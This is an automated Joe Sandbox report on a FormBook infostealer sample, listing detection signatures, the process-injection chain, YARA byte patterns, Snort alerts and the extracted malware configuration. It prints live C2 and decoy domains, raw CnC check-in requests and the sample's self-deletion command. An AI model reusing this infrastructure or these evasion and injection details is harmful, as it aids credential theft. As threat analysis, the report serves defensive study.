Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
UgHXEfw1uL.exe

Overview

General Information

Sample Name:UgHXEfw1uL.exe
Original Sample Name:e8fc0040e6882e0b9ea0e830b6d74d65.exe
Analysis ID:1348466
MD5:e8fc0040e6882e0b9ea0e830b6d74d65
SHA1:fb0b39b5f5c570c83b37a62a7b1563a48aefe2c4
SHA256:685107cecf3e5ac7ad43e40a9fc7d8ea35179a40973938ff74e5813d0a61dffc
Tags:32exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large array initializations
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Found decision node followed by non-executed suspicious APIs
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • UgHXEfw1uL.exe (PID: 2668 cmdline: C:\Users\user\Desktop\UgHXEfw1uL.exe MD5: E8FC0040E6882E0B9EA0E830B6D74D65)
    • UgHXEfw1uL.exe (PID: 4984 cmdline: C:\Users\user\Desktop\UgHXEfw1uL.exe MD5: E8FC0040E6882E0B9EA0E830B6D74D65)
      • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • control.exe (PID: 5748 cmdline: C:\Windows\SysWOW64\control.exe MD5: EBC29AA32C57A54018089CFC9CACAFE8)
          • cmd.exe (PID: 6768 cmdline: /c del "C:\Users\user\Desktop\UgHXEfw1uL.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 list": ["www.piabellacasino347.com/bp31/"], "decoy": ["nftcyberpunk.com", "nwg7e.top", "go99subpay.com", "colkora.com", "bkicg.com", "chubbysamericangrill.com", "ongcndwoyao8060.top", "goodbye-horses.com", "gchzwf.com", "baisheng.site", "mkfnrej28.xyz", "rbxer.com", "evitasoht.site", "keymuscatgroups.com", "jobassistancehub.com", "school-necromancer.com", "shop-pravaonline.online", "prefabricated-homes-62419.com", "vzuvzabuv.com", "bolfm.com", "gasiu.com", "newcitymastery.com", "xt393d.vip", "adminonlinechecker.online", "10964.top", "labonnepaires.com", "cgpattorneys.com", "aroundyoo.com", "tqmsn.com", "dogclubuk.com", "tgtsfo.top", "nutridietas.com", "videopromarket.com", "alnawrasalrahhal.com", "starnation.top", "cascadefinnish.com", "fnb.gay", "mulharemedia.com", "gurubasavschool.com", "odisexport.com", "midastouchdesign.com", "scatter78.win", "kpmgds.com", "biddrivego.com", "chrisbrannon.online", "kazi-foods.com", "spitzpr-gq.info", "28ve5e.top", "millerstoehr.com", "69mom.com", "dmmtcloud.com", "arjuncrackers.com", "gracelouwilliams.com", "8881811.com", "fixerradvisory.com", "darkpinefarm.com", "duke91.com", "vemo.site", "photonpulsetherapy.com", "honchoheadies.com", "allthingsnewxpo.com", "turdfi.xyz", "wowukltd.com", "ctnezpay.com"]}
SourceRuleDescriptionAuthorStrings
00000004.00000002.4547308540.000000000E765000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_772cc62dunknownunknown
  • 0xa82:$a2: pass
  • 0xa88:$a3: email
  • 0xa8f:$a4: login
  • 0xa96:$a5: signin
  • 0xaa7:$a6: persistent
  • 0xc7a:$r1: C:\Users\user\AppData\Roaming\6K710O60\6K7log.ini
00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 25 entries
      SourceRuleDescriptionAuthorStrings
      3.2.UgHXEfw1uL.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.UgHXEfw1uL.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.UgHXEfw1uL.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          3.2.UgHXEfw1uL.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          3.2.UgHXEfw1uL.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18849:$sqlite3step: 68 34 1C 7B E1
          • 0x1895c:$sqlite3step: 68 34 1C 7B E1
          • 0x18878:$sqlite3text: 68 38 2A 90 C5
          • 0x1899d:$sqlite3text: 68 38 2A 90 C5
          • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 5 entries
          No Sigma rule has matched
          Timestamp:192.168.2.5195.35.38.749724802031412 11/27/23-12:12:31.959094
          SID:2031412
          Source Port:49724
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5172.67.198.10249725802031412 11/27/23-12:12:53.755681
          SID:2031412
          Source Port:49725
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5103.224.212.21649722802031412 11/27/23-12:11:51.038850
          SID:2031412
          Source Port:49722
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.53.33.130.19049723802031412 11/27/23-12:12:11.298434
          SID:2031412
          Source Port:49723
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.53.33.130.19049721802031412 11/27/23-12:10:28.412473
          SID:2031412
          Source Port:49721
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.piabellacasino347.com/bp31/"], "decoy": ["nftcyberpunk.com", "nwg7e.top", "go99subpay.com", "colkora.com", "bkicg.com", "chubbysamericangrill.com", "ongcndwoyao8060.top", "goodbye-horses.com", "gchzwf.com", "baisheng.site", "mkfnrej28.xyz", "rbxer.com", "evitasoht.site", "keymuscatgroups.com", "jobassistancehub.com", "school-necromancer.com", "shop-pravaonline.online", "prefabricated-homes-62419.com", "vzuvzabuv.com", "bolfm.com", "gasiu.com", "newcitymastery.com", "xt393d.vip", "adminonlinechecker.online", "10964.top", "labonnepaires.com", "cgpattorneys.com", "aroundyoo.com", "tqmsn.com", "dogclubuk.com", "tgtsfo.top", "nutridietas.com", "videopromarket.com", "alnawrasalrahhal.com", "starnation.top", "cascadefinnish.com", "fnb.gay", "mulharemedia.com", "gurubasavschool.com", "odisexport.com", "midastouchdesign.com", "scatter78.win", "kpmgds.com", "biddrivego.com", "chrisbrannon.online", "kazi-foods.com", "spitzpr-gq.info", "28ve5e.top", "millerstoehr.com", "69mom.com", "dmmtcloud.com", "arjuncrackers.com", "gracelouwilliams.com", "8881811.com", "fixerradvisory.com", "darkpinefarm.com", "duke91.com", "vemo.site", "photonpulsetherapy.com", "honchoheadies.com", "allthingsnewxpo.com", "turdfi.xyz", "wowukltd.com", "ctnezpay.com"]}
          Source: UgHXEfw1uL.exeReversingLabs: Detection: 21%
          Source: UgHXEfw1uL.exeVirustotal: Detection: 31%Perma Link
          Source: Yara matchFile source: 3.2.UgHXEfw1uL.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.UgHXEfw1uL.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4532332199.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4532261427.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2071940487.000000000452E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: http://www.adminonlinechecker.online/bp31/www.gchzwf.comAvira URL Cloud: Label: malware
          Source: http://www.gchzwf.com/bp31/Avira URL Cloud: Label: malware
          Source: http://www.turdfi.xyzAvira URL Cloud: Label: malware
          Source: http://www.cascadefinnish.com/bp31/?yzuD_Vc=ieodBXaeqV8oce4b5CZNIl9GV0f6ZOMGR+lwHtCXy9ziWDHkC3UxRT7a3Y07V5Vcpr7g&wdR=K48xltk0G0VLCVcpAvira URL Cloud: Label: malware
          Source: http://www.fnb.gay/bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=UJqh63c9yiVXKVsa3boGAX6IISqW51ijhAAZGwRUAvira URL Cloud: Label: malware
          Source: http://www.tqmsn.com/bp31/Avira URL Cloud: Label: malware
          Source: http://www.turdfi.xyz/bp31/Avira URL Cloud: Label: phishing
          Source: http://www.turdfi.xyz/bp31/www.biddrivego.comAvira URL Cloud: Label: phishing
          Source: http://www.fnb.gay/bp31/Avira URL Cloud: Label: malware
          Source: http://www.fixerradvisory.com/bp31/Avira URL Cloud: Label: malware
          Source: http://www.fixerradvisory.com/bp31/www.millerstoehr.comAvira URL Cloud: Label: malware
          Source: http://www.bolfm.com/bp31/Avira URL Cloud: Label: malware
          Source: http://www.darkpinefarm.com/bp31/Avira URL Cloud: Label: malware
          Source: http://www.tqmsn.com/bp31/?yzuD_Vc=dYRoo3nky2kJslTOXyYMUSO6KlsUnF/dNMvaUDa17L1Ra/qERalht2gc+usxG4dP6WW+&wdR=K48xltk0G0VLCVcpAvira URL Cloud: Label: malware
          Source: http://www.cascadefinnish.com/bp31/www.alnawrasalrahhal.comAvira URL Cloud: Label: malware
          Source: http://www.biddrivego.com/bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=Z5L6sworWKjOpINWPo4O7LxjOb13jHcZOV7UNDMxrK5jvMEQfzuz5GlsSHRPBjwymNbkAvira URL Cloud: Label: malware
          Source: http://www.cascadefinnish.com/bp31/Avira URL Cloud: Label: malware
          Source: http://www.darkpinefarm.com/bp31/www.adminonlinechecker.onlineAvira URL Cloud: Label: malware
          Source: http://www.millerstoehr.com/bp31/Avira URL Cloud: Label: malware
          Source: www.piabellacasino347.com/bp31/Avira URL Cloud: Label: malware
          Source: http://www.adminonlinechecker.online/bp31/Avira URL Cloud: Label: malware
          Source: http://www.fnb.gay/bp31/www.fixerradvisory.comAvira URL Cloud: Label: malware
          Source: http://www.biddrivego.com/bp31/Avira URL Cloud: Label: malware
          Source: http://www.bolfm.com/bp31/www.videopromarket.comAvira URL Cloud: Label: malware
          Source: http://www.piabellacasino347.com/bp31/www.darkpinefarm.comAvira URL Cloud: Label: malware
          Source: http://www.millerstoehr.com/bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=DnQ2mpp/p9SrOrTdvvrBBnHCHwlyRJxHHfFV5U6skaUaBlNFsDA0N9XRwg9RyRq/LEOvAvira URL Cloud: Label: malware
          Source: http://www.millerstoehr.com/bp31/www.bolfm.comAvira URL Cloud: Label: malware
          Source: http://www.piabellacasino347.com/bp31/Avira URL Cloud: Label: malware
          Source: http://www.biddrivego.com/bp31/www.cascadefinnish.comAvira URL Cloud: Label: malware
          Source: UgHXEfw1uL.exeJoe Sandbox ML: detected
          Source: UgHXEfw1uL.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: UgHXEfw1uL.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: control.pdb source: UgHXEfw1uL.exe, 00000003.00000002.2122567291.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, UgHXEfw1uL.exe, 00000003.00000002.2122361690.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.4531441729.00000000009E0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: UgHXEfw1uL.exe, 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000003.2120875685.00000000049C7000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000003.2123652150.0000000004B77000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: UgHXEfw1uL.exe, UgHXEfw1uL.exe, 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, control.exe, control.exe, 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000003.2120875685.00000000049C7000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000003.2123652150.0000000004B77000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdbUGP source: UgHXEfw1uL.exe, 00000003.00000002.2122567291.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, UgHXEfw1uL.exe, 00000003.00000002.2122361690.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.4531441729.00000000009E0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: gozr.pdb source: explorer.exe, 00000004.00000002.4548710520.00000000108CF000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000005.00000002.4531735884.0000000002EDB000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.4533179411.000000000526F000.00000004.10000000.00040000.00000000.sdmp, UgHXEfw1uL.exe
          Source: Binary string: gozr.pdbSHA256 source: explorer.exe, 00000004.00000002.4548710520.00000000108CF000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000005.00000002.4531735884.0000000002EDB000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.4533179411.000000000526F000.00000004.10000000.00040000.00000000.sdmp, UgHXEfw1uL.exe
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 4x nop then pop ebx3_2_00407B1A
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 4x nop then pop edi3_2_00417DB7
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop ebx5_2_02A77B1D
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop edi5_2_02A87DB7

          Networking

          barindex
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.198.102 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 130.61.77.41 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 195.35.38.7 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.216 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 3.33.130.190 80Jump to behavior
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49721 -> 3.33.130.190:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49722 -> 103.224.212.216:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49723 -> 3.33.130.190:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49724 -> 195.35.38.7:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 172.67.198.102:80
          Source: Malware configuration extractorURLs: www.piabellacasino347.com/bp31/
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: ORACLE-BMC-31898US ORACLE-BMC-31898US
          Source: global trafficHTTP traffic detected: GET /bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=DnQ2mpp/p9SrOrTdvvrBBnHCHwlyRJxHHfFV5U6skaUaBlNFsDA0N9XRwg9RyRq/LEOv HTTP/1.1Host: www.millerstoehr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=Z5L6sworWKjOpINWPo4O7LxjOb13jHcZOV7UNDMxrK5jvMEQfzuz5GlsSHRPBjwymNbk HTTP/1.1Host: www.biddrivego.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp31/?yzuD_Vc=ieodBXaeqV8oce4b5CZNIl9GV0f6ZOMGR+lwHtCXy9ziWDHkC3UxRT7a3Y07V5Vcpr7g&wdR=K48xltk0G0VLCVcp HTTP/1.1Host: www.cascadefinnish.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=De6ETpvSJNr0YkBlOa1evZHTiRZW0fGv0LVlBpygzy/UcKoa1AD6rYeri5b5ah2pQQV4 HTTP/1.1Host: www.alnawrasalrahhal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp31/?yzuD_Vc=dYRoo3nky2kJslTOXyYMUSO6KlsUnF/dNMvaUDa17L1Ra/qERalht2gc+usxG4dP6WW+&wdR=K48xltk0G0VLCVcp HTTP/1.1Host: www.tqmsn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 3.33.130.190 3.33.130.190
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 27 Nov 2023 11:10:28 GMTContent-Type: text/htmlContent-Length: 291Connection: closeETag: "6552b2f2-123"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 27 Nov 2023 11:12:11 GMTContent-Type: text/htmlContent-Length: 291Connection: closeETag: "6552b2aa-123"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: explorer.exe, 00000004.00000002.4540698292.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2078672674.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2078672674.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4540698292.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000004.00000002.4531444837.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2075184468.0000000000F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
          Source: explorer.exe, 00000004.00000002.4540698292.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2078672674.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2078672674.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4540698292.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000004.00000002.4540698292.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2078672674.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2078672674.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4540698292.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000004.00000002.4540698292.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2078672674.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2078672674.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4540698292.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000004.00000002.4540698292.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2078672674.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000004.00000002.4540163883.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.4540212535.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.4539524842.0000000007DC0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: UgHXEfw1uL.exe, 00000000.00000002.2071512446.0000000002B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
